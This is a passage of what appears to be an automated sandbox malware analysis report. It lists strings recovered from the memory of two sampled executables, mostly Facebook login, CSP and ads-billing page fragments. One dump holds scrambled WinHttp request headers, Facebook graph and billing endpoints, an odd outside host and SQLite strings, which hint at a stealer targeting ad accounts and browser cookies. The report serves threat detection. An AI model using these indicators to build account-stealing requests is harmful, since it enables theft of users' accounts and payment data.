                  Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: e</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Arabic"> equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: elwww.facebook.comnal equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fcebhttps://www.facebook.com/AAAAAAIAAA}Q equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fwww.facebook.com f` equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hc\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"7197781313797005068"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7153952208847046505"}]],["FalcoLoggerTransports","attach",[],[]],["Chromedome","start",[],[{}]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["ServiceWorkerURLCleaner","removeRedirectID",[],[]],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","ofFHY1PySQOY7kGdyUGK82_B",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","ofFHY7CMK_b7GQpGJOAZvD3H",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829 equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hp?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing_used,form_data,display_name,icon_url,federation_url,skip_z equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.facebook. equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/XQc equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.647490629.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.530168385.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingCookiesW equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingN equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingO equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingnPxT equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingndex_meta_1 equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingnf equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingp equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billings equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingsz equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billinguDX equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing| equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing$, equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing^ equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingc equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/u5 equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing$y equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingD equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.625617363.00000000005DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingw.facebo7) equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: iostreambad castbad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setinvalid stoi argumentstoi argument out of rangeUse whatppphatYk43h7gr riwjg^(([^:\/?#]+):)?(//([^\/?#:]*)(:([^\/?#]*))?)?([^?#]*)(\?([^#]*))?(#(.*))?httphttps?Error (WinHttpSendRequest)Error (WinHttpReceiveResponseCeheg34g)Error (WinHttpQueryDataAvailable)Error (WinHttpReadData)g.com/iaaaehttp://aaa.aptpokmmooootmtmymuok.com/w.facebohttps://wwcebfSTPOGET/device-based/logination/x-www-form-urlencodedContent-Type: applicokcebofak.comaceboohttps://www.fOrigin: le Chrome";v="104"" Not A; Brand";v="99", "Googsec-ch-ua: "Chromium";v="104", gned-exchange;v=b3;q=0.9ng,*/*;q=0.8,application/sication/xml;q=0.9,image/webp,image/ap,appliAccept: text/html,application/xhtml+xmlq=0.1,bn;q=0.1,eu;q=0.1=0.1,ast;q=0.1,az;r;q=0.3,an;q=0.2,hy;qq=0.6,am;q=0.5,sq;q=0.4,aa;q=0.7,af;Accept-Language: en,q=0.9;q=0.8,jep-aliveection: keConn/ads/manager/account_settings/account_billingbusiness.facebook.comacebook.comsiness.fHost: buok.comHost: www.fath: 1920viewport-widsec-ch-ua-mobile: ?0tform: "Windows"sec-ch-ua-plaefers-color-scheme: lightsec-ch-prde-Insecure-Requests: 1Upgraetch-Site: noneSec-FSec-Fetch-Mode: navigatech-User: ?1Sec-Fetmenth-Dest: docuSec-Fetc/v13.0/omcebook.cHost: graph.faa-mobile: ?0sec-ch-udows"sec-ch-ua-platform: "Winw-form-urlencodedplication/x-wwContent-type: ap/*Accept: *ame-sitech-Site: sSec-Fetch-Mode: cors: emptySec-Fetch-Destook.com/r: https://www.facebRefereboofaceHost: www.t-Length: Contenh-ua-mobile: ?0sec-catform: "Windows"sec-ch-ua-plrefers-color-scheme: lightsec-ch-pre-Requests: 1Upgrade-Insecuode: navigateSec-Fetch-MSec-Fetch-User: ?1ocumentSec-Fetch-Dest: de-originite: samSec-Fetch-SError (WinHttpSetOption)Error (WinHttpAddRequestHeaders)vector<bool> too longalnumalnumalphaalphablankblankcntrlcntrlddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacessupperupperwwxdigitxdigit01SYSTEM_MALLOCTHREADSAFE=1SQLITE_local time unavailablelocaltimeunixepochutcweekday start of monthyeardayhourminutesecond%04d-%02d-%02d %02d:%02d:%02d%02d:%02d:%02d%04d-%02d-%02d%02d%06.3f%03d%.16g%lld%04djuliandaydatetimedatetimestrftimecurrent_timecurrent_timestampcurrent_date%NaN-Inf+InfInfNULL(NULL).922337203685477580?FunctionSavepointAutoCommitTransactionSorterNextPrevIfOpenNextIfOpenPrevNextAggStepCheckpointJournalModeVacuumVFilterVUpdateGotoGosubReturnNotInitCoroutineEndCoroutineYieldHaltIfNullHaltIntegerInt64StringNullSoftNullBlobVariableMoveCopySCopyResultRowCollSeqAddImmMustBeIntRealAffinityCastPermutationCompareJumpOnceIfIfNotColumnAffinityMakeRecordCountReadCookieSetCookieReopenIdxOpenReadOpenWriteOpenAutoindexOpenEphemeralSorterOpenSequenceTestOpenPseudoCloseSeekLTSeekLESeekGESeekGTSeekNoConflictNotFoundFoundNotExistsOrAndSequenceNewRowidInsertIsNullNotNullNeEqGtLeLtGeInsertIntBitAndBitOrShiftLeftShiftRightAddSubtractMultiplyDivideRemainderConcatDeleteBitNotString8ResetCountSorterCompareSorterDataRowKeyRowDataRowidNullRowLastSorterSortSortRewindSorterIn
                  Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">T equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script> equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p.Rwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espa equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: uscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: uscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupscross-origin-resource-policysame-origindocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3Phttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-Type0Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 13 Oct 2022 11:08:17 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: word" class="inputtext _55r1 inputtext _9npi inputtext _9npi" name="pass" id="pass" tabindex="0" placeholder="Password" value="" autocomplete="current-password" aria-label="Password" /><div class="_9ls7" id="u_0_4_+a"><a href="#" role="button"><div class="_9lsa"><div class="_9lsb" id="u_0_5_7R"></div></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a href="https://www.facebook.com/recover/initiate/?ars=facebook_login" class="_97w4" target="">Forgot account?</a><span role="presentation" aria-hidden="true"> equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.647838153.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.570583469.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.534210487.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.647490629.0000000000868000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.534868517.000000000087A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569867418.0000000000868000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648461867.0000000002480000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.560741420.000000000249C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.558357025.0000000002489000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com, equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.534210487.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com4k equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com<O equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com@ F equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.533682365.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.529868290.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646863987.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comGER equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.555840925.0000000002475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comGER+ equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.555840925.0000000002475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comGER= equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000002.628806983.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comHTEP equals www.facebook.com (Facebook)
                  Source: 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comP equals www.facebook.com (Facebook)
                  Source: EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com[3O equals www.facebook.com (Facebook)
